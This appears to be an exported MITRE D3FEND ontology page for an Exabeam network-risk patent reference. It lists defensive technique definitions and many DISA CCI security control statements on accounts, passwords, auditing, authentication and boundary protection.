
Individual: 'Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc'

Types (1)

definition

  • "Access modeling identifies and records the access permissions granted to administrators, users, groups, and systems."

rdfs:label

  • "Access Modeling"

d3fend-id

  • "D3-AM"

kb-reference

maps

Usage (5)

definition

  • "Active logical link mapping sends and receives network traffic as a means to map the whole data link layer, where the links represent logical data flows rather than physical connections."

kb-article

  • "## How it works

    Active logical link mapping establishes awareness of logical links in the network by sending data over the network to gather information about logical connections in the network.

    Typically this will be achieved through network telemetry coordinated for network management and monitoring and will use a link layer discovery protocol such as LLDP, with the information gathered and aggregated at higher levels using an application protocol such as SNMP. The information may be polled by network management software or configured once and then pushed from network sensors (or agents).

    Another means of establishing network connectivity is by sending traffic through the use of a tool such as traceroute, to determine the logical paths through the network architecture.

    ## Considerations

    * Best practice is to encrypt network monitoring data and require authentication for queries or admin/management functions.
    * Push notifications reduce the bandwidth necessary to capture and maintain information if reliable transport is used.
    * Special consideration should be made before using active scanning in OT networks, and OT-safe options chosen where available."

rdfs:label

  • "Active Logical Link Mapping"

d3fend-id

  • "D3-ALLM"

kb-reference

may-query

Usage (5)

definition

  • "Active physical link mapping sends and receives network traffic as a means to map the physical layer."

rdfs:label

  • "Active Physical Link Mapping"

synonym

  • "Active Physical Layer Mapping"

d3fend-id

  • "D3-APLM"

kb-reference

may-query

Usage (5)

definition

  • "Asset inventorying identifies and records the organization's assets and enriches each inventory item with knowledge about their vulnerabilities."

rdfs:label

  • "Asset Inventory"

synonym

  • "Asset Discovery"
  • "Asset Inventorying"

d3fend-id

  • "D3-AI"

display-order

  • 1

enables

Usage (5)

definition

  • "Asset vulnerability enumeration enriches inventory items with knowledge identifying their vulnerabilities."

rdfs:label

  • "Asset Vulnerability Enumeration"

d3fend-id

  • "D3-AVE"

evaluates

identifies

kb-reference

Usage (5)

definition

  • "The organization employs automated mechanisms to support the information system account management functions."

rdfs:label

  • "CCI-000015"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically removes or disables temporary accounts after an organization-defined time period for each type of account."

rdfs:label

  • "CCI-000016"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically disables inactive accounts after an organization-defined time period."

rdfs:label

  • "CCI-000017"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically audits account creation actions."

rdfs:label

  • "CCI-000018"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system dynamically manages user privileges and associated access authorizations."

rdfs:label

  • "CCI-000020"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces one or more organization-defined nondiscretionary access control policies over an organization-defined set of users and resources."

rdfs:label

  • "CCI-000022"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces information flow control using explicit security attributes on information, source, and destination objects as a basis for flow control decisions."

rdfs:label

  • "CCI-000025"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces dynamic information flow control based on organization-defined policies."

rdfs:label

  • "CCI-000027"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined limitations on the embedding of data types within other data types."

rdfs:label

  • "CCI-000029"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces information flow control based on organization-defined metadata."

rdfs:label

  • "CCI-000030"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces information flow control using organization-defined security policy filters as a basis for flow control decisions for organization-defined information flows."

rdfs:label

  • "CCI-000032"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for a privileged administrator to enable/disable organization-defined security policy filters under organization-defined conditions."

rdfs:label

  • "CCI-000034"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides the capability for privileged administrators to configure the organization-defined security policy filters to support different security policies."

rdfs:label

  • "CCI-000035"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements separation of duties through assigned information system access authorizations."

rdfs:label

  • "CCI-000037"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization audits any use of privileged accounts, or roles, with access to organization-defined security functions or security-relevant information, when accessing other system functions."

rdfs:label

  • "CCI-000040"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces the organization-defined limit of consecutive invalid logon attempts by a user during the organization-defined time period."

rdfs:label

  • "CCI-000044"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system delays next login prompt according to the organization-defined delay algorithm, when the maximum number of unsuccessful attempts is exceeded, automatically locks the account/node for an organization-defined time period or locks the account/node until released by an Administrator IAW organizational policy."

rdfs:label

  • "CCI-000047"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system retains the session lock until the user reestablishes access using established identification and authentication procedures."

rdfs:label

  • "CCI-000056"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system initiates a session lock after the organization-defined time period of inactivity."

rdfs:label

  • "CCI-000057"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for users to directly initiate session lock mechanisms."

rdfs:label

  • "CCI-000058"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system conceals, via the session lock, information previously visible on the display with a publicly viewable image."

rdfs:label

  • "CCI-000060"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization enforces requirements for remote connections to the information system."

rdfs:label

  • "CCI-000066"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system monitors remote access methods."

rdfs:label

  • "CCI-000067"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the confidentiality of remote access sessions."

rdfs:label

  • "CCI-000068"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization monitors for unauthorized remote connections to the information system on an organization-defined frequency."

rdfs:label

  • "CCI-000071"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system alerts designated organization-defined personnel or roles in the event of an audit processing failure."

rdfs:label

  • "CCI-000139"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a warning when allocated audit record storage volume reaches an organization-defined percentage of maximum audit record storage capacity."

rdfs:label

  • "CCI-000143"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a real-time alert when organization-defined audit failure events occur."

rdfs:label

  • "CCI-000144"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized access."

rdfs:label

  • "CCI-000162"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized modification."

rdfs:label

  • "CCI-000163"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit information from unauthorized deletion."

rdfs:label

  • "CCI-000164"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, validates certifications by constructing and verifying a certification path to an accepted trust anchor including checking certificate status information."

rdfs:label

  • "CCI-000185"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, enforces authorized access to the corresponding private key."

rdfs:label

  • "CCI-000186"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for PKI-based authentication, maps the authenticated identity to the account of the individual or group."

rdfs:label

  • "CCI-000187"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of upper case characters used."

rdfs:label

  • "CCI-000192"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of lower case characters used."

rdfs:label

  • "CCI-000193"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of numeric characters used."

rdfs:label

  • "CCI-000194"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, when new passwords are created, enforces that at least an organization-defined number of characters are changed."

rdfs:label

  • "CCI-000195"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, stores only cryptographically-protected passwords."

rdfs:label

  • "CCI-000196"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for password-based authentication, transmits only cryptographically-protected passwords."

rdfs:label

  • "CCI-000197"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces minimum password lifetime restrictions."

rdfs:label

  • "CCI-000198"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces maximum password lifetime restrictions."

rdfs:label

  • "CCI-000199"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits password reuse for the organization-defined number of generations."

rdfs:label

  • "CCI-000200"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces minimum password length."

rdfs:label

  • "CCI-000205"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces approved authorizations for logical access to information and system resources in accordance with applicable access control policies."

rdfs:label

  • "CCI-000213"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, when transferring information between different security domains, identifies information flows by data type specification and usage."

rdfs:label

  • "CCI-000218"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, decomposes information into organization-defined policy-relevant subcomponents for submission to policy enforcement mechanisms."

rdfs:label

  • "CCI-000219"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability for a privileged administrator to configure organization-defined security policy filters to support different security policies."

rdfs:label

  • "CCI-000226"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs automated mechanisms to enforce access restrictions."

rdfs:label

  • "CCI-000346"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the installation of organization-defined critical software programs that are not signed with a certificate that is recognized and approved by the organization."

rdfs:label

  • "CCI-000352"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms to respond to unauthorized changes to organization-defined configuration settings."

rdfs:label

  • "CCI-000374"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization configures the information system to provide only essential capabilities."

rdfs:label

  • "CCI-000381"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization configures the information system to prohibit or restrict the use of organization-defined functions, ports, protocols, and/or services."

rdfs:label

  • "CCI-000382"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs automated mechanisms to prevent program execution on the information system in accordance with the organization-defined specifications."

rdfs:label

  • "CCI-000386"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The organization disables network access by unauthorized components/devices or notifies designated organizational officials."

rdfs:label

  • "CCI-000417"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization (or information system) enforces explicit rules governing the installation of software by users."

rdfs:label

  • "CCI-000663"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system uniquely identifies and authenticates organizational users (or processes acting on behalf of organizational users)."

rdfs:label

  • "CCI-000764"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to privileged accounts."

rdfs:label

  • "CCI-000765"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to non-privileged accounts."

rdfs:label

  • "CCI-000766"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for local access to privileged accounts."

rdfs:label

  • "CCI-000767"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for local access to non-privileged accounts."

rdfs:label

  • "CCI-000768"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses multifactor authentication for network access to privileged accounts where one of the factors is provided by a device separate from the information system being accessed."

rdfs:label

  • "CCI-000771"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses multifactor authentication for network access to non-privileged accounts where one of the factors is provided by a device separate from the information system being accessed."

rdfs:label

  • "CCI-000772"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses organization-defined replay-resistant authentication mechanisms for network access to privileged accounts."

rdfs:label

  • "CCI-000774"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses organization-defined replay-resistant authentication mechanisms for network access to non-privileged accounts."

rdfs:label

  • "CCI-000776"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users)."

rdfs:label

  • "CCI-000804"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements a configurable capability to automatically disable the information system if organization-defined security violations are detected."

rdfs:label

  • "CCI-000831"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs strong authenticators in the establishment of nonlocal maintenance and diagnostic sessions."

rdfs:label

  • "CCI-000877"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization audits non-local maintenance and diagnostic sessions."

rdfs:label

  • "CCI-000880"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects nonlocal maintenance sessions by employing organization-defined authenticators that are replay resistant."

rdfs:label

  • "CCI-000884"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to protect the integrity and confidentiality of non-local maintenance and diagnostic communications."

rdfs:label

  • "CCI-000888"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uses cryptographic mechanisms to protect and restrict access to information on portable digital media."

rdfs:label

  • "CCI-001009"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to protect information in storage."

rdfs:label

  • "CCI-001019"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements privileged access authorization to organization-identified information system components for selected organization-defined vulnerability scanning activities."

rdfs:label

  • "CCI-001067"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms to detect the presence of unauthorized software on organizational information systems and notify designated organizational officials in accordance with the organization-defined frequency."

rdfs:label

  • "CCI-001069"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system separates user functionality (including user interface services) from information system management functionality."

rdfs:label

  • "CCI-001082"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the presentation of information system management-related functionality at an interface for non-privileged users."

rdfs:label

  • "CCI-001083"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system isolates security functions from nonsecurity functions."

rdfs:label

  • "CCI-001084"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system utilizes underlying hardware separation mechanisms to implement security function isolation."

rdfs:label

  • "CCI-001085"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions."

rdfs:label

  • "CCI-001086"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization implements an information system isolation boundary to minimize the number of nonsecurity functions included within the boundary containing security functions."

rdfs:label

  • "CCI-001087"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization implements security functions as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers."

rdfs:label

  • "CCI-001089"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents unauthorized and unintended information transfer via shared system resources."

rdfs:label

  • "CCI-001090"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects against or limits the effects of the organization-defined or referenced types of denial of service attacks."

rdfs:label

  • "CCI-001092"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system restricts the ability of individuals to launch organization-defined denial of service attacks against other information systems."

rdfs:label

  • "CCI-001094"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system limits the use of resources by priority."

rdfs:label

  • "CCI-001096"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents public access into the organization's internal networks except as appropriately mediated by managed interfaces employing boundary protection devices."

rdfs:label

  • "CCI-001100"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system at managed interfaces denies network communications traffic by default and allows network communications traffic by exception (i.e., deny all, permit by exception)."

rdfs:label

  • "CCI-001109"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system prevents remote devices that have established a non-remote connection with the system from communicating outside of that communications path with resources in external networks."

rdfs:label

  • "CCI-001111"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at managed interfaces, denies network traffic and audits internal users (or malicious code) posing a threat to external information systems."

rdfs:label

  • "CCI-001115"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system checks incoming communications to ensure the communications are coming from an authorized source and routed to an authorized destination."

rdfs:label

  • "CCI-001117"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements host-based boundary protection mechanisms for servers, workstations, and mobile devices."

rdfs:label

  • "CCI-001118"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents discovery of specific system components composing a managed interface."

rdfs:label

  • "CCI-001124"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces adherence to protocol format."

rdfs:label

  • "CCI-001125"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the integrity of transmitted information."

rdfs:label

  • "CCI-001127"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures."

rdfs:label

  • "CCI-001128"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system terminates the network connection associated with a communications session at the end of the session or after an organization-defined time period of inactivity."

rdfs:label

  • "CCI-001133"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements required cryptographic protections using cryptographic modules that comply with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance."

rdfs:label

  • "CCI-001144"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs, at a minimum, FIPS-validated cryptography to protect unclassified information."

rdfs:label

  • "CCI-001145"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs NSA-approved cryptography to protect classified information."

rdfs:label

  • "CCI-001146"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs, at a minimum, FIPS-validated cryptography to protect information when such information must be separated from individuals who have the necessary clearances yet lack the necessary access approvals."

rdfs:label

  • "CCI-001147"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits remote activation of collaborative computing devices, excluding the organization-defined exceptions where remote activation is to be allowed."

rdfs:label

  • "CCI-001150"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system identifies organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001166"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the download of organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001169"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the automatic execution of mobile code in organization-defined software applications."

rdfs:label

  • "CCI-001170"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides additional data origin authentication artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries."

rdfs:label

  • "CCI-001178"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system invalidates session identifiers upon user logout or other session termination."

rdfs:label

  • "CCI-001185"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the confidentiality and/or integrity of organization-defined information at rest."

rdfs:label

  • "CCI-001199"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information at rest unless otherwise protected by alternative physical measures."

rdfs:label

  • "CCI-001200"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at organization-defined information system components, loads and executes the operating environment from hardware-enforced, read-only media."

rdfs:label

  • "CCI-001210"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, at organization-defined information system components, loads and executes organization-defined applications from hardware-enforced, read-only media."

rdfs:label

  • "CCI-001211"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated mechanisms on an organization-defined frequency to determine the state of information system components with regard to flaw remediation."

rdfs:label

  • "CCI-001233"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs automated patch management tools to facilitate flaw remediation to organization-defined information system components."

rdfs:label

  • "CCI-001237"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs malicious code protection mechanisms at information system entry and exit points to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities."

rdfs:label

  • "CCI-001239"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization configures malicious code protection mechanisms to perform real-time scans of files from external sources at endpoints as the files are downloaded, opened, or executed in accordance with organizational security policy."

rdfs:label

  • "CCI-001242"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system monitors inbound and outbound communications for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-001262"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system detects unauthorized changes to software and information."

rdfs:label

  • "CCI-001297"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs spam protection mechanisms at information system entry and exit points to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means."

rdfs:label

  • "CCI-001305"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system checks the validity of organization-defined inputs."

rdfs:label

  • "CCI-001310"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of audit information."

rdfs:label

  • "CCI-001350"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects the audit records of non-local accesses to privileged accounts and the execution of privileged functions."

rdfs:label

  • "CCI-001352"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization monitors for atypical usage of information system accounts."

rdfs:label

  • "CCI-001356"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system enforces approved authorizations for controlling the flow of information within the system based on organization-defined information flow control policies."

rdfs:label

  • "CCI-001368"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, implements organization-defined security policy filters requiring fully enumerated formats that restrict data structure and content."

rdfs:label

  • "CCI-001372"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, examines the information for the presence of organization-defined unsanctioned information."

rdfs:label

  • "CCI-001373"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, prohibits the transfer of organization-defined unsanctioned information in accordance with the organization-defined security policy."

rdfs:label

  • "CCI-001374"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies source domains for information transfer."

rdfs:label

  • "CCI-001376"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely authenticates source domains for information transfer."

rdfs:label

  • "CCI-001377"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in storage."

rdfs:label

  • "CCI-001399"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in process."

rdfs:label

  • "CCI-001400"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports and maintains the binding of organization-defined security attributes to information in transmission."

rdfs:label

  • "CCI-001401"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically audits account modification actions."

rdfs:label

  • "CCI-001403"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system automatically audits account disabling actions."

rdfs:label

  • "CCI-001404"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system automatically audits account removal actions."

rdfs:label

  • "CCI-001405"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system enforces approved authorizations for controlling the flow of information between interconnected systems based on organization-defined information flow control policies."

rdfs:label

  • "CCI-001414"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system dynamically associates security attributes with organization-defined subjects in accordance with organization-defined security policies as information is created and combined."

rdfs:label

  • "CCI-001424"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to change the value of associated security attributes."

rdfs:label

  • "CCI-001425"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the binding of security attributes to information with sufficient assurance that the information--attribute association can be used as the basis for automated policy actions."

rdfs:label

  • "CCI-001426"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system allows authorized users to associate security attributes with information."

rdfs:label

  • "CCI-001427"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system displays security attributes in human-readable form on each object that the system transmits to output devices to identify organization-identified special dissemination, handling, or distribution instructions using organization-identified human-readable, standard naming conventions."

rdfs:label

  • "CCI-001428"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization disables organization-defined networking protocols within the information system deemed to be nonsecure except for explicitly identified components in support of specific operational requirements."

rdfs:label

  • "CCI-001436"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the organization-defined time period during which the limit of consecutive invalid access attempts by a user is counted."

rdfs:label

  • "CCI-001452"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of remote access sessions."

rdfs:label

  • "CCI-001453"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The organization ensures that remote sessions for accessing an organization-defined list of security functions and security-relevant information are audited."

rdfs:label

  • "CCI-001454"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized access."

rdfs:label

  • "CCI-001493"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized modification."

rdfs:label

  • "CCI-001494"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects audit tools from unauthorized deletion."

rdfs:label

  • "CCI-001495"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of audit tools."

rdfs:label

  • "CCI-001496"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization limits privileges to change software resident within software libraries."

rdfs:label

  • "CCI-001499"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies destination domains for information transfer."

rdfs:label

  • "CCI-001555"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely authenticates destination domains for information transfer."

rdfs:label

  • "CCI-001556"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system tracks problems associated with the information transfer."

rdfs:label

  • "CCI-001557"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system rejects or delays, as defined by the organization, network traffic which exceeds the organization-defined thresholds."

rdfs:label

  • "CCI-001574"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization incorporates detection of unauthorized, security-relevant configuration changes into the organization's incident response capability to ensure they are tracked."

rdfs:label

  • "CCI-001589"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces password complexity by the minimum number of special characters used."

rdfs:label

  • "CCI-001619"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization protects nonlocal maintenance sessions by separating the maintenance session from other network sessions with the information system by either physically separated communications paths or logically separated communications paths based upon encryption."

rdfs:label

  • "CCI-001632"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system takes organization-defined corrective action when organization-defined unacceptable mobile code is identified."

rdfs:label

  • "CCI-001662"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs malicious code protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities."

rdfs:label

  • "CCI-001668"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs spam protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means."

rdfs:label

  • "CCI-001677"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically removes or disables emergency accounts after an organization-defined time period for each type of account."

rdfs:label

  • "CCI-001682"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account creation actions."

rdfs:label

  • "CCI-001683"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account modification actions."

rdfs:label

  • "CCI-001684"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account disabling actions."

rdfs:label

  • "CCI-001685"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system notifies organization-defined personnel or roles for account removal actions."

rdfs:label

  • "CCI-001686"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents the execution of organization-defined unacceptable mobile code."

rdfs:label

  • "CCI-001695"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined security responses automatically if baseline configurations are changed in an unauthorized manner."

rdfs:label

  • "CCI-001744"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents the installation of organization-defined software components without verification the software component has been digitally signed using a certificate that is recognized and approved by the organization."

rdfs:label

  • "CCI-001749"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization disables organization-defined functions, ports, protocols, and services within the information system deemed to be unnecessary and/or nonsecure."

rdfs:label

  • "CCI-001762"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents program execution in accordance with organization-defined policies regarding software program usage and restrictions, and/or rules authorizing the terms and conditions of software program usage."

rdfs:label

  • "CCI-001764"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs an allow-all, deny-by-exception policy to prohibit the execution of unauthorized software programs on the information system."

rdfs:label

  • "CCI-001767"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs a deny-all, permit-by-exception policy to allow the execution of authorized software programs on the information system."

rdfs:label

